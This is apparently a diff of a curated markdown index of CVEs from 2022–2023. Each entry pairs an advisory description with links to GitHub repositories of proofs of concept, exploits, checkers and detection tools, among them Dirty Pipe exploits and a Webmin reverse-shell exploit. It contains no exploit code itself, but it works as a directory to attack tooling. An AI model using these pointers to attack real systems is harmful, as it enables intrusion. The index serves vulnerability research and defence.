+- [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit) +- [Featherw1t/CVE-2023-51385_test](https://github.com/Featherw1t/CVE-2023-51385_test) +- [GroundCTL2MajorTom/CVE-2023-51385POC](https://github.com/GroundCTL2MajorTom/CVE-2023-51385POC) +- [GroundCTL2MajorTom/CVE-2023-51385P-POC](https://github.com/GroundCTL2MajorTom/CVE-2023-51385P-POC) + +### CVE-2023-51409 (2024-04-12) + +Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.\n\n + + +- [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409) +- [Nxploited/CVE-2023-51409](https://github.com/Nxploited/CVE-2023-51409) + +### CVE-2023-51448 (2023-12-22) + +Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `‘managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `‘/cacti/managers.php’` with an SQLi payload in the `‘selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist. + + +- [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc) + +### CVE-2023-51467 (2023-12-26) + +The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code\n\n + + +- [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467) +- [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467) +- [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT) +- [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass) +- [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467) +- [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit) +- [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467) +- [2ptr/BadBizness-CVE-2023-51467](https://github.com/2ptr/BadBizness-CVE-2023-51467) +- [AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-](https://github.com/AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-) + +### CVE-2023-51504 (2024-02-05) + +Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.\n\n + + +- [Sybelle03/CVE-2023-51504](https://github.com/Sybelle03/CVE-2023-51504) + +### CVE-2023-51518 (2024-02-27) + +Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.\nGiven a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation.\nNote that by default JMX endpoint is only bound locally.\n\nWe recommend users to:\n - Upgrade to a non-vulnerable Apache James version\n\n - Run Apache James isolated from other processes (docker - dedicated virtual machine)\n - If possible turn off JMX\n\n + + +- [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518) + +### CVE-2023-51764 (2023-12-24) + +Postfix through 3.8.5 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required, such as the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9. + + +- [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764) +- [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764) +- [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC) +- [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764) + +### CVE-2023-51800 (2024-02-29) + +Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter. + + +- [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800) + +### CVE-2023-51801 (2024-02-29) + +SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages. + + +- [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801) + +### CVE-2023-51802 (2024-02-29) + +Cross Site Scripting (XSS) vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the page or class_month parameter in the /php-attendance/attendance_report component. + + +- [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802) + +### CVE-2023-51810 (2024-01-16) + +SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module. + + +- [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810) + +### CVE-2023-52160 (2024-02-22) + +The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks. + + +- [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn) + +### CVE-2023-52251 (2024-01-25) + +An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. + + +- [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC) + +### CVE-2023-52268 (2024-11-12) + +The End-User Portal module before 1.0.65 for FreeScout sometimes allows an attacker to authenticate as an arbitrary user because a session token can be sent to the /auth endpoint. NOTE: this module is not part of freescout-helpdesk/freescout on GitHub. + + +- [squ1dw3rm/CVE-2023-52268](https://github.com/squ1dw3rm/CVE-2023-52268) + +### CVE-2023-52654 (2024-05-09) + +In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/af_unix: disable sending io_uring over sockets\n\nFile reference cycles have caused lots of problems for io_uring\nin the past, and it still doesn't work exactly right and races with\nunix_stream_read_generic(). The safest fix would be to completely\ndisallow sending io_uring files via sockets via SCM_RIGHT, so there\nare no possible cycles invloving registered files and thus rendering\nSCM accounting on the io_uring side unnecessary. + + +- [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654) + +### CVE-2023-52709 +- [KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC](https://github.com/KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC) + ## 2022 +### CVE-2022-0155 (2022-01-10) + +follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor + + +- [coana-tech/CVE-2022-0155-PoC](https://github.com/coana-tech/CVE-2022-0155-PoC) + +### CVE-2022-0165 (2022-03-14) + +The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users + + +- [K3ysTr0K3R/CVE-2022-0165-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT) +- [Cappricio-Securities/CVE-2022-0165](https://github.com/Cappricio-Securities/CVE-2022-0165) + ### CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system. - [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185) +- [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc) +- [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185) - [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185) - [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion) - [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit) +- [dcheng69/CVE-2022-0185-Case-Study](https://github.com/dcheng69/CVE-2022-0185-Case-Study) + +### CVE-2022-0219 (2022-01-20) + +Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2. + + +- [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219) + +### CVE-2022-0236 (2022-01-18) + +The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible for unauthenticated attackers to download any imported or exported information from a vulnerable site which can contain sensitive information like user data. This affects versions up to, and including, 3.9.15. + + +- [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236) +- [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236) ### CVE-2022-0265 (2022-03-03) @@ -22,12 +16605,49 @@ - [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265) +### CVE-2022-0316 (2023-01-23) + +The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server. + + +- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit) + +### CVE-2022-0332 (2022-01-25) + +A flaw was found in Moodle in versions 3.11 to 3.11.4. An SQL injection risk was identified in the h5p activity web service responsible for fetching user attempt data. + + +- [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332) + ### CVE-2022-0337 (2023-01-02) Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High) - [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera) +- [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-) +- [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC) + +### CVE-2022-0412 (2022-02-28) + +The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks + + +- [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit) + +### CVE-2022-0435 (2022-03-25) + +A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network. + + +- [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435) + +### CVE-2022-0439 (2022-03-07) + +The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link. + + +- [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439) ### CVE-2022-0441 (2022-03-07) @@ -35,6 +16655,9 @@ - [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441) +- [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441) +- [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441) +- [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441) ### CVE-2022-0482 (2022-03-09) @@ -42,6 +16665,7 @@ - [Acceis/exploit-CVE-2022-0482](https://github.com/Acceis/exploit-CVE-2022-0482) +- [mija-pilkaite/CVE-2022-0482_exploit](https://github.com/mija-pilkaite/CVE-2022-0482_exploit) ### CVE-2022-0486 (2022-05-17) @@ -55,7 +16679,21 @@ A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. +- [PaloAltoNetworks/can-ctr-escape-cve-2022-0492](https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492) +- [SofianeHamlaoui/CVE-2022-0492-Checker](https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker) +- [chenaotian/CVE-2022-0492](https://github.com/chenaotian/CVE-2022-0492) +- [bb33bb/CVE-2022-0492](https://github.com/bb33bb/CVE-2022-0492) - [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492) +- [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape) +- [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC) + +### CVE-2022-0529 (2022-02-09) + +A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. + + +- [nanaao/unzip_poc](https://github.com/nanaao/unzip_poc) +- [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc) ### CVE-2022-0540 (2022-04-20) @@ -70,36 +16708,132 @@ - [0x7eTeam/CVE-2022-0543](https://github.com/0x7eTeam/CVE-2022-0543) +- [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543) +- [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543) +- [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack) + +### CVE-2022-0591 (2022-03-21) + +The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users + + +- [im-hanzou/FC3er](https://github.com/im-hanzou/FC3er) + +### CVE-2022-0666 (2022-02-18) + +CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11. + + +- [keyboardancer/CVE-2022-0666](https://github.com/keyboardancer/CVE-2022-0666) + +### CVE-2022-0725 (2022-03-07) + +A flaw was found in keepass. The vulnerability occurs due to logging the plain text passwords in system log and leads to an Information Exposure vulnerability. This flaw allows an attacker to interact and read sensitive passwords and logs. + + +- [ByteHackr/keepass_poc](https://github.com/ByteHackr/keepass_poc) + +### CVE-2022-0739 (2022-03-21) + +The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection + + +- [destr4ct/CVE-2022-0739](https://github.com/destr4ct/CVE-2022-0739) +- [Chris01s/CVE-2022-0739](https://github.com/Chris01s/CVE-2022-0739) +- [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739) +- [hadrian3689/wp_bookingpress_1.0.11](https://github.com/hadrian3689/wp_bookingpress_1.0.11) +- [G01d3nW01f/CVE-2022-0739](https://github.com/G01d3nW01f/CVE-2022-0739) +- [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739) +- [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739) +- [lhamouche/Bash-exploit-for-CVE-2022-0739](https://github.com/lhamouche/Bash-exploit-for-CVE-2022-0739) ### CVE-2022-0778 (2022-03-15) The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). +- [drago-96/CVE-2022-0778](https://github.com/drago-96/CVE-2022-0778) - [yywing/cve-2022-0778](https://github.com/yywing/cve-2022-0778) - [jkakavas/CVE-2022-0778-POC](https://github.com/jkakavas/CVE-2022-0778-POC) - [0xUhaw/CVE-2022-0778](https://github.com/0xUhaw/CVE-2022-0778) +- [Trinadh465/openssl-1.1.1g_CVE-2022-0778](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2022-0778) +- [jeongjunsoo/CVE-2022-0778](https://github.com/jeongjunsoo/CVE-2022-0778) +- [hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778) + +### CVE-2022-0811 (2022-03-16) + +A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. + + +- [spiarh/webhook-cve-2022-0811](https://github.com/spiarh/webhook-cve-2022-0811) ### CVE-2022-0824 (2022-03-02) Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. +- [faisalfs10x/Webmin-CVE-2022-0824-revshell](https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell) - [honypot/CVE-2022-0824](https://github.com/honypot/CVE-2022-0824) +- [pizza-power/golang-webmin-CVE-2022-0824-revshell](https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell) +- [gokul-ramesh/WebminRCE-exploit](https://github.com/gokul-ramesh/WebminRCE-exploit) ### CVE-2022-0847 (2022-03-07) A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. +- [bbaranoff/CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847) +- [xndpxs/CVE-2022-0847](https://github.com/xndpxs/CVE-2022-0847) - [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847) +- [Arinerron/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit) +- [crowsec-edtech/Dirty-Pipe](https://github.com/crowsec-edtech/Dirty-Pipe) +- [lucksec/CVE-2022-0847](https://github.com/lucksec/CVE-2022-0847) +- [si1ent-le/CVE-2022-0847](https://github.com/si1ent-le/CVE-2022-0847) +- [bohr777/cve-2022-0847dirtypipe-exploit](https://github.com/bohr777/cve-2022-0847dirtypipe-exploit) +- [ZZ-SOCMAP/CVE-2022-0847](https://github.com/ZZ-SOCMAP/CVE-2022-0847) +- [cspshivam/CVE-2022-0847-dirty-pipe-exploit](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit) +- [febinrev/dirtypipez-exploit](https://github.com/febinrev/dirtypipez-exploit) +- [ahrixia/CVE_2022_0847](https://github.com/ahrixia/CVE_2022_0847) +- [knqyf263/CVE-2022-0847](https://github.com/knqyf263/CVE-2022-0847) +- [puckiestyle/CVE-2022-0847](https://github.com/puckiestyle/CVE-2022-0847) +- [0xIronGoat/dirty-pipe](https://github.com/0xIronGoat/dirty-pipe) +- [ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit) +- [mrchucu1/CVE-2022-0847-Docker](https://github.com/mrchucu1/CVE-2022-0847-Docker) - [basharkey/CVE-2022-0847-dirty-pipe-checker](https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker) +- [4luc4rdr5290/CVE-2022-0847](https://github.com/4luc4rdr5290/CVE-2022-0847) +- [dadhee/CVE-2022-0847_DirtyPipeExploit](https://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit) +- [Greetdawn/CVE-2022-0847-DirtyPipe](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe) +- [Al1ex/CVE-2022-0847](https://github.com/Al1ex/CVE-2022-0847) +- [Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit) +- [nanaao/Dirtypipe-exploit](https://github.com/nanaao/Dirtypipe-exploit) +- [AyoubNajim/cve-2022-0847dirtypipe-exploit](https://github.com/AyoubNajim/cve-2022-0847dirtypipe-exploit) +- [pentestblogin/pentestblog-CVE-2022-0847](https://github.com/pentestblogin/pentestblog-CVE-2022-0847) +- [gyaansastra/CVE-2022-0847](https://github.com/gyaansastra/CVE-2022-0847) - [DataDog/dirtypipe-container-breakout-poc](https://github.com/DataDog/dirtypipe-container-breakout-poc) +- [babyshen/CVE-2022-0847](https://github.com/babyshen/CVE-2022-0847) +- [edsonjt81/CVE-2022-0847-Linux](https://github.com/edsonjt81/CVE-2022-0847-Linux) +- [chenaotian/CVE-2022-0847](https://github.com/chenaotian/CVE-2022-0847) +- [V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit) +- [al4xs/CVE-2022-0847-Dirty-Pipe](https://github.com/al4xs/CVE-2022-0847-Dirty-Pipe) +- [Greetdawn/CVE-2022-0847-DirtyPipe-](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe-) +- [crusoe112/DirtyPipePython](https://github.com/crusoe112/DirtyPipePython) +- [nanaao/dirtyPipe-automaticRoot](https://github.com/nanaao/dirtyPipe-automaticRoot) - [arttnba3/CVE-2022-0847](https://github.com/arttnba3/CVE-2022-0847) - [AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) +- [sa-infinity8888/Dirty-Pipe-CVE-2022-0847](https://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847) +- [realbatuhan/dirtypipetester](https://github.com/realbatuhan/dirtypipetester) +- [CYB3RK1D/CVE-2022-0847-POC](https://github.com/CYB3RK1D/CVE-2022-0847-POC) +- [breachnix/dirty-pipe-poc](https://github.com/breachnix/dirty-pipe-poc) +- [Shotokhan/cve_2022_0847_shellcode](https://github.com/Shotokhan/cve_2022_0847_shellcode) +- [githublihaha/DirtyPIPE-CVE-2022-0847](https://github.com/githublihaha/DirtyPIPE-CVE-2022-0847) +- [MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker](https://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker) - [jpts/CVE-2022-0847-DirtyPipe-Container-Breakout](https://github.com/jpts/CVE-2022-0847-DirtyPipe-Container-Breakout) - [LudovicPatho/CVE-2022-0847_dirty-pipe](https://github.com/LudovicPatho/CVE-2022-0847_dirty-pipe) +- [DanaEpp/pwncat_dirtypipe](https://github.com/DanaEpp/pwncat_dirtypipe) - [tmoneypenny/CVE-2022-0847](https://github.com/tmoneypenny/CVE-2022-0847) +- [scopion/dirty-pipe](https://github.com/scopion/dirty-pipe) +- [stfnw/Debugging_Dirty_Pipe_CVE-2022-0847](https://github.com/stfnw/Debugging_Dirty_Pipe_CVE-2022-0847) +- [drapl0n/dirtypipe](https://github.com/drapl0n/dirtypipe) - [mhanief/dirtypipe](https://github.com/mhanief/dirtypipe) - [tufanturhan/CVE-2022-0847-L-nux-PrivEsc](https://github.com/tufanturhan/CVE-2022-0847-L-nux-PrivEsc) - [rexpository/linux-privilege-escalation](https://github.com/rexpository/linux-privilege-escalation) @@ -110,6 +16844,52 @@ - [greenhandatsjtu/CVE-2022-0847-Container-Escape](https://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape) - [jxpsx/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/jxpsx/CVE-2022-0847-DirtyPipe-Exploits) - [Asbatel/CBDS_CVE-2022-0847_POC](https://github.com/Asbatel/CBDS_CVE-2022-0847_POC) +- [airbus-cert/dirtypipe-ebpf_detection](https://github.com/airbus-cert/dirtypipe-ebpf_detection) +- [edr1412/Dirty-Pipe](https://github.com/edr1412/Dirty-Pipe) +- [eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits) +- [EagleTube/CVE-2022-0847](https://github.com/EagleTube/CVE-2022-0847) +- [yoeelingBin/CVE-2022-0847-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0847-Container-Escape) +- [notl0cal/dpipe](https://github.com/notl0cal/dpipe) +- [Gustavo-Nogueira/Dirty-Pipe-Exploits](https://github.com/Gustavo-Nogueira/Dirty-Pipe-Exploits) +- [b4dboy17/Dirty-Pipe-Oneshot](https://github.com/b4dboy17/Dirty-Pipe-Oneshot) +- [edsonjt81/CVE-2022-0847-DirtyPipe-](https://github.com/edsonjt81/CVE-2022-0847-DirtyPipe-) +- [Turzum/ps-lab-cve-2022-0847](https://github.com/Turzum/ps-lab-cve-2022-0847) +- [qwert419/linux-](https://github.com/qwert419/linux-) +- [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847) +- [pmihsan/Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/Dirty-Pipe-CVE-2022-0847) +- [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs) +- [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847) +- [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits) +- [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape) +- [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847) +- [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc) +- [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF) +- [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation) +- [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe) +- [n3rada/DirtyPipe](https://github.com/n3rada/DirtyPipe) +- [ayushx007/CVE-2022-0847-dirty-pipe-checker](https://github.com/ayushx007/CVE-2022-0847-dirty-pipe-checker) +- [ayushx007/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/ayushx007/CVE-2022-0847-DirtyPipe-Exploits) +- [solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus](https://github.com/solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus) +- [letsr00t/CVE-2022-0847](https://github.com/letsr00t/CVE-2022-0847) +- [xsxtw/CVE-2022-0847](https://github.com/xsxtw/CVE-2022-0847) +- [muhammad1596/CVE-2022-0847-dirty-pipe-checker](https://github.com/muhammad1596/CVE-2022-0847-dirty-pipe-checker) +- [muhammad1596/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/muhammad1596/CVE-2022-0847-DirtyPipe-Exploits) +- [JustinYe377/CTF-CVE-2022-0847](https://github.com/JustinYe377/CTF-CVE-2022-0847) + +### CVE-2022-0848 (2022-03-04) + +OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11. + + +- [dskmehra/CVE-2022-0848](https://github.com/dskmehra/CVE-2022-0848) +- [Lay0us/CVE-2022-0848-RCE](https://github.com/Lay0us/CVE-2022-0848-RCE) + +### CVE-2022-0853 